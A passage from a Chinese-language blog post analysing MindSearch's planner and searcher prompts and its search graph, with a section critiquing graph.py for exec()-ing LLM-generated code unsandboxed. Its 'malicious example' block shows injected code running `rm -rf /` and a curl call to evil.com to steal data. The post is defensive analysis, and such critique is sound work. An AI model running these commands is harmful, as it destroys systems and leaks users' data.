<h2 id="3-mindsearch-promptmindsearch_promptpy">3. MindSearch Prompt(mindsearch_prompt.py)</h2>
<p>这个模块负责两级思考链路：</p>
<ol>
<li>第一级：Planner（用 GRAPH_PROMPT）
负责“如何拆问题 → 建图 → 决定搜索哪些子问题”。</li>
<li>第二级：Searcher（用 searcher_system_prompt）
负责“针对一个原子化的子问题，真正去搜索网页，并给出带引用的答案”。</li>
</ol>
<h3 id="planner-的工作流程graph_prompt">Planner 的工作流程（GRAPH_PROMPT）</h3>
<ol>
<li>目标
把一个复杂提问拆成可以并行/串行搜索的单知识点子问题，用 WebSearchGraph 构造有向无环图，最终汇总成答案。</li>
<li>关键约束</li>
<li>示例执行顺序（对应 graph_fewshot_example_cn）</li>
</ol>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>graph = WebSearchGraph()
</span></span><span style="display:flex;"><span>graph.add_root_node(&#34;哪家大模型API最便宜?&#34;,&#34;root&#34;)
</span></span><span style="display:flex;"><span>graph.add_node(&#34;大模型API提供商&#34;, &#34;目前有哪些主要的大模型API提供商？&#34;)
</span></span><span style="display:flex;"><span>graph.add_node(&#34;OpenAI价格&#34;, &#34;OpenAI 的 GPT-4 最新价格是多少？&#34;)
</span></span><span style="display:flex;"><span>graph.add_node(&#34;Claude价格&#34;, &#34;Claude 3.5 Sonnet 最新价格是多少？&#34;)
</span></span><span style="display:flex;"><span>graph.add_edge(&#34;root&#34;,&#34;大模型API提供商&#34;)
</span></span><span style="display:flex;"><span>graph.add_edge(&#34;大模型API提供商&#34;,&#34;OpenAI价格&#34;)
</span></span><span style="display:flex;"><span>graph.add_edge(&#34;大模型API提供商&#34;,&#34;Claude价格&#34;)
</span></span><span style="display:flex;"><span>graph.node(&#34;大模型API提供商&#34;)  # 触发搜索并看到结果
</span></span></code></pre></div><p>LLM 拿到搜索结果后，再决定是继续拆，还是直接 add_response_node 汇总。</p>
<h3 id="searcher-的工作流程searcher_system_prompt">Searcher 的工作流程（searcher_system_prompt）</h3>
<ol>
<li>
<p>目标
针对 Planner 给出的“当前问题”，真正调用搜索工具，返回带索引引用的简洁答案，以便 Planner 后续拼装。</p>
</li>
<li>
<p>工具</p>
</li>
<li>
<p>思考-行动格式
我的思考……&lt;|action_start|&gt;&lt;|plugin|&gt;{&ldquo;name&rdquo;:&ldquo;FastWebBrowser.search&rdquo;, &ldquo;parameters&rdquo;:{&hellip;}}&lt;|action_end|&gt;</p>
</li>
<li>
<p>引用规范
答案中每句关键信息后面加 [[idx]]，idx 与搜索结果里的 id 对应。
示例：
截至 2024-07，OpenAI GPT-4 的定价为 $0.06 / 1k tokens [[0]]。</p>
</li>
<li>
<p>历史问题拼接
如果 Planner 给 Searcher 的 prompt 里还带了“历史问题/回答”，Searcher 会把它们放在某个区块里，方便在先前基础上追问，避免重复搜索。</p>
</li>
</ol>
<h3 id="模板变量如下">模板变量如下</h3>
<h3 id="流程-1">流程</h3>
<ol>
<li>Planner 收到用户问题 → 拆成 sub_questions → 调用 graph.add_node 触发搜索。</li>
<li>Searcher 收到 sub_question → 调用浏览器 → 返回带引用的 answer。</li>
<li>Planner 把 answer 填回图 → 判断是否继续拆 or 直接 add_response_node。</li>
<li>最终 Planner 调用 add_response_node，把整图所有问答对拼给大模型，用 FINAL_RESPONSE_CN/EN 模板生成“最终完整答案”。</li>
</ol>
<h1 id="可以改进的地方">可以改进的地方</h1>
<h3 id="1-exec的使用会带来安全问题">1. exec的使用会带来安全问题</h3>
<p>在&quot;graph.py&quot; 中的代码有如下代码：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>def run(self, command, local_dict, global_dict, stream_graph=False):
</span></span><span style="display:flex;"><span>    def extract_code(text: str) -&gt; str:
</span></span><span style="display:flex;"><span>        text = re.sub(r&#34;from ([\w.]+) import WebSearchGraph&#34;, &#34;&#34;, text)
</span></span><span style="display:flex;"><span>        # ... existing code ...
</span></span><span style="display:flex;"><span>        return text
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    command = extract_code(command)
</span></span><span style="display:flex;"><span>    exec(command, global_dict, local_dict)  # 🚨 直接执行任意代码
</span></span></code></pre></div><p>问题分析：</p>
<ul>
<li>任意代码执行: 直接执行从LLM生成的Python代码，没有任何安全限制</li>
<li>全局命名空间污染: 使用globals()作为执行环境，可能影响整个程序状态</li>
<li>系统调用风险: 恶意代码可以执行系统命令、文件操作、网络请求等</li>
</ul>
<h3 id="2-代码提取机制不够安全">2. 代码提取机制不够安全</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>def extract_code(text: str) -&gt; str:
</span></span><span style="display:flex;"><span>    text = re.sub(r&#34;from ([\w.]+) import WebSearchGraph&#34;, &#34;&#34;, text)
</span></span><span style="display:flex;"><span>    triple_match = re.search(r&#34;```[^\n]*\n(.+?)```&#34;, text, re.DOTALL)
</span></span><span style="display:flex;"><span>    single_match = re.search(r&#34;`([^`]*)`&#34;, text, re.DOTALL)
</span></span><span style="display:flex;"><span>    if triple_match:
</span></span><span style="display:flex;"><span>        return triple_match.group(1)
</span></span><span style="display:flex;"><span>    elif single_match:
</span></span><span style="display:flex;"><span>        return single_match.group(1)
</span></span><span style="display:flex;"><span>    return text
</span></span></code></pre></div><p>问题：</p>
<ul>
<li>简单的正则过滤: 只是移除了WebSearchGraph的import，但没有限制其他危险操作</li>
<li>回退机制: 如果没有匹配到代码块，直接返回原文本执行</li>
</ul>
<h3 id="3-缺乏代码沙箱">3. 缺乏代码沙箱</h3>
<p>当前实现没有任何沙箱机制：</p>
<ul>
<li>没有限制可用的模块和函数</li>
<li>没有限制文件系统访问</li>
<li>没有限制网络访问</li>
<li>没有资源使用限制（CPU、内存、时间）</li>
</ul>
<h3 id="4-潜在的注入攻击">4. 潜在的注入攻击</h3>
<p>恶意用户可能通过精心构造的输入来执行危险代码：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span># 恶意示例
</span></span><span style="display:flex;"><span>&#34;&#34;&#34;
</span></span><span style="display:flex;"><span>graph = WebSearchGraph()
</span></span><span style="display:flex;"><span>import os
</span></span><span style="display:flex;"><span>os.system(&#34;rm -rf /&#34;)  # 删除系统文件
</span></span><span style="display:flex;"><span>import subprocess
</span></span><span style="display:flex;"><span>subprocess.run([&#34;curl&#34;, &#34;evil.com/steal_data&#34;])  # 数据泄露
</span></span><span style="display:flex;"><span>&#34;&#34;&#34;
</span></span></code></pre></div><h2 id="替代方案">替代方案</h2>
<ol>
<li>
<p>使用AST解析和白名单</p>
</li>
<li>
<p>使用受限的执行环境</p>
</li>
<li>
<p>使用专门的沙箱库</p>
</li>
<li>
<p>避免动态代码</p>
</li>
</ol>
<h1 id="其他">其他</h1>
<h2 id="图的概念">图的概念</h2>
<p>这里用到的“图”其实是一张「问题拆解 + 搜索结果」的流程图——节点就是“要解决的小问题”，边表示“先解决谁，再解决谁”。</p>
<ol>
<li>图长什么样？</li>
</ol>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>边（箭头）只表示“依赖”或“顺序”：
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>root → 子问题1 → 子问题2 → response
</span></span><span style="display:flex;"><span>      ↘ 子问题3 ↗
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>如果子问题之间没有依赖，可以并列：
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>root → A
</span></span><span style="display:flex;"><span>root → B
</span></span><span style="display:flex;"><span>A、B → response
</span></span></code></pre></div><ol start="2">
<li>图在代码里怎么表示？</li>
</ol>
<ul>
<li>nodes：字典
key 是节点名字，value 里存“问题内容 / 搜到的答案 / 对话记忆”。</li>
<li>adjacency_list：字典
key 是起始节点，value 是一个列表，列表里每个元素是“一条箭头”指向谁。</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plain" data-lang="plain"><span style="display:flex;"><span>nodes = {
</span></span><span style="display:flex;"><span>  &#34;root&#34;: {&#34;content&#34;:&#34;哪家大模型API最便宜？&#34;},
</span></span><span style="display:flex;"><span>  &#34;provider&#34;: {&#34;content&#34;:&#34;有哪些大模型API？&#34;},
</span></span><span style="display:flex;"><span>  &#34;price&#34;: {&#34;content&#34;:&#34;OpenAI价格？&#34;}
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>adjacency_list = {
</span></span><span style="display:flex;"><span>  &#34;root&#34;: [{&#34;id&#34;:&#34;...&#34;, &#34;name&#34;:&#34;provider&#34;}],
</span></span><span style="display:flex;"><span>  &#34;provider&#34;: [{&#34;id&#34;:&#34;...&#34;, &#34;name&#34;:&#34;price&#34;}]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ol>
<li>图有什么用？</li>
</ol>

  </article>
<div class="px-2 mb-2">
  
  <script src="https://utteranc.es/client.js"
    repo="HuizhiXu/huizhixu.github.io"
    issue-term="pathname"
    theme="github-light"
    crossorigin="anonymous"
    async>
  </script>
  
</div>
<div class="bg-blue-100 dark:bg-gray-900">
  <div class="container px-4 py-12 mx-auto max-w-4xl grid grid-cols-1 md:grid-cols-2 gap-4 items-center">
    <div>
      <div class="text-2xl font-bold mb-2">Sein heißt werden, leben heißt lernen.</div>
      <p class="opacity-60">Der einfache Weg is immer verkehrt.</p>
    </div>

    <ul class="flex justify-center gap-x-3 flex-wrap gap-y-2">
      

      
      <li>
        <a
          href="https://twitter.com/"
          target="_blank"
          rel="noopener"
          aria-label="Twitter"
          class="p-1 inline-block rounded-full border border-transparent text-gray-500 hover:text-gray-800 hover:border-gray-800 cursor-pointer transition-colors dark:text-gray-600 dark:hover:border-gray-300 dark:hover:text-gray-300"
        >
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 24 24"
            stroke-width="1.5"
            stroke="currentColor"
            fill="none"
            stroke-linecap="round"
            stroke-linejoin="round"
          >
            <path stroke="none" d="M0 0h24v24H0z" fill="none" />
            <path
              d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c-.002 -.249 1.51 -2.772 1.818 -4.013z"
            />
          </svg>
        </a>
      </li>
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      
      <li>
        <a
          href="https://github.com/"
          target="_blank"
          rel="noopener"
          aria-label="GitHub"
          class="p-1 inline-block rounded-full border border-transparent text-gray-500 hover:text-gray-800 hover:border-gray-800 cursor-pointer transition-colors dark:text-gray-600 dark:hover:border-gray-300 dark:hover:text-gray-300"
        >
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="24"
            height="24"
            viewBox="0 0 24 24"
            stroke-width="1.5"
            stroke="currentColor"
            fill="none"
            stroke-linecap="round"
            stroke-linejoin="round"
          >
            <path stroke="none" d="M0 0h24v24H0z" fill="none" />
            <path
              d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5"
            />
          </svg>
        </a>
      </li>
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      
    </ul>
  </div>
</div>

    </main><footer class="container p-6 mx-auto flex justify-between items-center">
  <span class="text-sm font-light">
    
    Copyright © 2012 - Huizhi Xu · All rights reserved
    
  </span>
  <span onclick="window.scrollTo({top: 0, behavior: 'smooth'})" class="p-1 cursor-pointer">
    <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" viewBox="0 0 24 24" stroke-width="1.5"
      stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
      <path stroke="none" d="M0 0h24v24H0z" fill="none" />
      <path d="M18 15l-6 -6l-6 6h12" />
    </svg>
  </span>
</footer>

<div class="search-ui absolute top-0 left-0 w-full h-full bg-white dark:bg-gray-800 hidden">
  <div class="container max-w-3xl mx-auto p-12">
    <div class="relative">
      <div class="my-4 text-center text-2xl font-bold">Search</div>

      <span class="p-2 absolute right-0 top-0 cursor-pointer close-search">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" stroke-width="1.5"
          stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
          <path stroke="none" d="M0 0h24v24H0z" fill="none" />
          <line x1="18" y1="6" x2="6" y2="18" />
          <line x1="6" y1="6" x2="18" y2="18" />
        </svg>
      </span>
    </div>

    <input type="search" class="py-2 px-3 w-full dark:text-black border dark:border-transparent"
      placeholder="Enter search query" />

    <div class="search-results text-lg font-medium my-4 hidden">Results</div>
    <ul class="search-list my-2">

    </ul>

    <div class="no-results text-center my-8 hidden">
      <div class="text-xl font-semibold mb-2">No results found</div>
      <p class="font-light text-sm">Try adjusting your search query</p>
    </div>
  </div>
</div>





<script src="http://localhost:1313/js/scripts.min.js"></script>




<script>
  const languageMenuButton = document.querySelector('.language-switcher');
  const languageDropdown = document.querySelector('.language-dropdown');
  languageMenuButton.addEventListener('click', (evt) => {
    evt.preventDefault()
    if (languageDropdown.classList.contains('hidden')) {
      languageDropdown.classList.remove('hidden')
      languageDropdown.classList.add('flex')
    } else {
      languageDropdown.classList.add('hidden');
      languageDropdown.classList.remove('flex');
    }
  })
</script>



<script>
  
  const darkmode = document.querySelector('.toggle-dark-mode');
  function toggleDarkMode() {
    if (document.documentElement.classList.contains('dark')) {
      document.documentElement.classList.remove('dark')
      localStorage.setItem('darkmode', 'light')
    } else {
      document.documentElement.classList.add('dark')
      localStorage.setItem('darkmode', 'dark')
    }
  }
  if (darkmode) {
    darkmode.addEventListener('click', toggleDarkMode);
  }

  const darkStorage = localStorage.getItem('darkmode');
  const isBrowserDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches;

  if (!darkStorage && isBrowserDark) {
    document.documentElement.classList.add('dark');
  }

  if (darkStorage && darkStorage === 'dark') {
    toggleDarkMode();
  }
</script>


<script>
  const mobileMenuButton = document.querySelector('.mobile-menu-button')
  const mobileMenu = document.querySelector('.mobile-menu')
  function toggleMenu() {
    mobileMenu.classList.toggle('hidden');
    mobileMenu.classList.toggle('flex');
  }
  if(mobileMenu && mobileMenuButton){
    mobileMenuButton.addEventListener('click', toggleMenu)
  }
</script>
</body>
</html>
